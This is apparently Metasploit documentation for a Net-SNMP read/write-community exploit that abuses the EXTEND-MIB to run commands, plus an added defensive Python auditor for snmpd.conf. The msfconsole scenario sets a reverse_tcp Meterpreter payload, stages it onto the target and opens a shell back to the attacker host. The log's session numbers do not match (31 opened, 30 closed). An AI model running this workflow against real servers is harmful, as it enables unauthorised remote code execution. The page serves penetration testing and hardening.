Vulnerable Application
This module uses the SNMP-EXTEND-MIB, one of Net-SNMP's extension MIBs, to achieve remote code execution on Linux Net-SNMPD servers that expose a read/write community string: with write access, SNMP SET requests can configure MIB extensions, and those extensions run commands on the host.
Verification Steps
- Start `msfconsole`
- Do: `use exploit/linux/snmp/net_snmpd_rw_access`
- Do: `set rhost [IP]`
- Do: `set community [SNMP Community]`
- Do: `set version [SNMP Version]`
- Configure the payload
- Do: `run`
- You should get a session
Options
FILEPATH
The location to write the executable out to on the target. Needs to be writable by the SNMP service user. This defaults to /tmp.
COMMUNITY
The read/write community string of the target Net-SNMP service.
VERSION
The SNMP protocol version. Accepted values are '1' or '2c'.
CHUNKSIZE
The maximum number of payload bytes to write in a single operation. This value was found through experimentation and may not be suitable in all environments, but should work for all cmdstager flavors.
Note that cmdstager payloads are modified to allow further escaping, so the usable limit may also differ between cmdstager flavors.
This is possibly related to the following bug: https://sourceforge.net/p/net-snmp/bugs/2542/
TIMEOUT
Specifies the maximum time to wait for an SNMP response before the request times out.
SHELL
The shell invoked with `-c` on the target to run the staged commands. Defaults to '/bin/bash'.
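Whether a host is exposed to this module comes down to its snmpd.conf: a read/write community (or an SNMPv3 rwuser) whose view reaches NET-SNMP-EXTEND-MIB is what the COMMUNITY option above relies on, while a read-only community or a view that excludes the extend subtree does not give the module what it needs. The following audit script is an added example for this page, not code from the Metasploit module or from Net-SNMP. It parses the real snmpd.conf access directives (rocommunity, rwcommunity, rocommunity6, rwcommunity6, rouser, rwuser, view, extend), resolves `-V` view restrictions with longest-prefix matching on numeric OIDs (view masks are ignored), and reports which entries make the extend MIB writable. The NET-SNMP-EXTEND-MIB subtree OID is the real one; the sample configuration at the bottom is constructed for the example.

```python
"""Audit a Net-SNMP snmpd.conf for write access that reaches NET-SNMP-EXTEND-MIB.

Added example for this page, not part of the Metasploit module or of Net-SNMP.
The directives handled are real snmpd.conf directives; the sample config below
is constructed.  View matching uses longest-prefix semantics on numeric OIDs
and ignores view masks.
"""
from dataclasses import dataclass

# NET-SNMP-EXTEND-MIB::nsExtendObjects; the writable nsExtendConfigTable lives here.
EXTEND_OID = ".1.3.6.1.4.1.8072.1.3.2"
WRITE_DIRECTIVES = {"rwcommunity", "rwcommunity6", "rwuser"}
READ_DIRECTIVES = {"rocommunity", "rocommunity6", "rouser"}
DEFAULT_COMMUNITIES = {"public", "private"}  # common vendor defaults


@dataclass
class Finding:
    line_no: int
    severity: str  # "high", "medium" or "info"
    message: str


def _oid_parts(oid: str) -> list[str]:
    return [p for p in oid.split(".") if p]


def _is_prefix(prefix: str, oid: str) -> bool:
    p, o = _oid_parts(prefix), _oid_parts(oid)
    return o[: len(p)] == p


def _directives(text: str):
    """Yield (line_no, directive, args) with comments and blank lines dropped."""
    for line_no, raw in enumerate(text.splitlines(), start=1):
        parts = raw.split("#", 1)[0].split()
        if parts:
            yield line_no, parts[0].lower(), parts[1:]


def parse_views(text: str) -> dict[str, list[tuple[bool, str]]]:
    """Map view name -> ordered (included?, subtree OID) entries."""
    views: dict[str, list[tuple[bool, str]]] = {}
    for _, directive, args in _directives(text):
        if directive == "view" and len(args) >= 3:
            views.setdefault(args[0], []).append((args[1].lower() == "included", args[2]))
    return views


def view_covers_extend(entries: list[tuple[bool, str]]) -> bool:
    """True if the view exposes nsExtendObjects or any subtree beneath it."""
    best = None  # (depth, included) of the most specific entry above the extend tree
    for included, oid in entries:
        if included and _is_prefix(EXTEND_OID, oid) and _oid_parts(oid) != _oid_parts(EXTEND_OID):
            return True  # a child of the extend tree is explicitly included
        if _is_prefix(oid, EXTEND_OID):
            depth = len(_oid_parts(oid))
            if best is None or depth > best[0]:
                best = (depth, included)
    return best is not None and best[1]


def audit_snmpd_conf(text: str) -> list[Finding]:
    """Return findings, most severe first, for write access reaching the extend MIB."""
    views = parse_views(text)
    findings: list[Finding] = []
    for line_no, directive, args in _directives(text):
        name = args[0] if args else "<missing>"
        if directive in WRITE_DIRECTIVES:
            view = None
            if "-V" in args and args.index("-V") + 1 < len(args):
                view = args[args.index("-V") + 1]
            if view is not None and view in views and not view_covers_extend(views[view]):
                findings.append(Finding(line_no, "medium",
                    f"{directive} '{name}' is writable but view '{view}' excludes the extend MIB"))
                continue
            if directive == "rwuser":
                where = "(SNMPv3 user)"
            else:
                source = args[1] if len(args) > 1 and args[1] != "-V" else "any source"
                where = f"from {source}"
            msg = f"{directive} '{name}' allows SNMP SET on the extend MIB {where}"
            if directive != "rwuser" and name in DEFAULT_COMMUNITIES:
                msg += " with a default community string"
            findings.append(Finding(line_no, "high", msg))
        elif directive in READ_DIRECTIVES and directive != "rouser" and name in DEFAULT_COMMUNITIES:
            findings.append(Finding(line_no, "medium",
                f"{directive} uses default community string '{name}'"))
        elif directive == "extend":
            findings.append(Finding(line_no, "info", f"static extend entry: {' '.join(args)}"))
    order = {"high": 0, "medium": 1, "info": 2}
    return sorted(findings, key=lambda f: (order[f.severity], f.line_no))


# Constructed sample configuration for the example.
SAMPLE_CONF = """\
# constructed sample snmpd.conf
rocommunity public 192.168.1.0/24
rwcommunity private
rwcommunity netops-rw 10.0.0.5 -V sysonly
rwuser admin priv
extend uptime /bin/cat /proc/uptime
view sysonly included .1.3.6.1.2.1.1
"""

if __name__ == "__main__":
    for f in audit_snmpd_conf(SAMPLE_CONF):
        print(f"line {f.line_no:>2} [{f.severity:<6}] {f.message}")
```

Run against a real `/etc/snmp/snmpd.conf` by reading the file into `audit_snmpd_conf`. A `high` finding is the configuration this module targets; the fix is to drop the read/write community (most monitoring needs only `rocommunity`), or to restrict it with `-V` to a view that does not include `.1.3.6.1.4.1.8072.1.3.2`, and to change any default community strings regardless.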
Scenarios
```
msf > use exploit/linux/snmp/net_snmpd_rw_access
msf exploit(linux/snmp/net_snmpd_rw_access) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(linux/snmp/net_snmpd_rw_access) > set rhost 192.168.1.3
rhost => 192.168.1.3
msf exploit(linux/snmp/net_snmpd_rw_access) > set lhost 192.168.1.2
lhost => 192.168.1.2
msf exploit(linux/snmp/net_snmpd_rw_access) > set community private
community => private
msf exploit(linux/snmp/net_snmpd_rw_access) > set version 2c
version => 2c
msf exploit(linux/snmp/net_snmpd_rw_access) > show info
Name: Net-SNMPd Write Access SNMP-EXTEND-MIB arbitrary code execution
Module: exploit/linux/snmp/net_snmpd_rw_access
Platform:
Arch:
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
Steve Embling at InteliSecure
Available targets:
Id Name
-- ----
0 Linux x86
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
CHUNKSIZE 200 yes Maximum bytes of payload to write at once
COMMUNITY private yes SNMP Community String
FILEPATH /tmp yes file path to write to
RETRIES 1 yes SNMP Retries
RHOST 192.168.1.3 yes The target address
RPORT 161 yes The target port (TCP)
SHELL /bin/bash yes Shell to call with -c argument
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TIMEOUT 1 yes SNMP Timeout
URIPATH no The URI to use for this exploit (default is random)
VERSION 2c yes SNMP Version <1/2c>
Payload information:
Space: 4096
Description:
This exploit module exploits the SNMP write access configuration
ability of SNMP-EXTEND-MIB to configure MIB extensions and lead to
remote code execution.
References:
https://www.intelisecure.com
msf exploit(linux/snmp/net_snmpd_rw_access) > run
[*] Started reverse TCP handler on 192.168.1.2:4444
[*] Command Stager progress - 1.11% done (199/17924 bytes)
[*] Command Stager progress - 2.23% done (399/17924 bytes)
[*] Command Stager progress - 3.34% done (598/17924 bytes)
[*] Command Stager progress - 4.45% done (797/17924 bytes)
... Redacted ...
[*] Command Stager progress - 98.64% done (17681/17924 bytes)
[*] Command Stager progress - 99.72% done (17873/17924 bytes)
[*] Sending stage (857352 bytes) to 192.168.1.3
[*] Meterpreter session 31 opened (192.168.1.2:4444 -> 192.168.1.3:54232) at 2018-02-14 17:30:22 +0000
[+] SNMP request timeout (this is promising).
[*] Command Stager progress - 100.00% done (18022/18022 bytes)
meterpreter > getuid
Server username: uid=121, gid=129, euid=121, egid=129
meterpreter > exit
[*] 192.168.1.3 - Meterpreter session 30 closed. Reason: User exit
```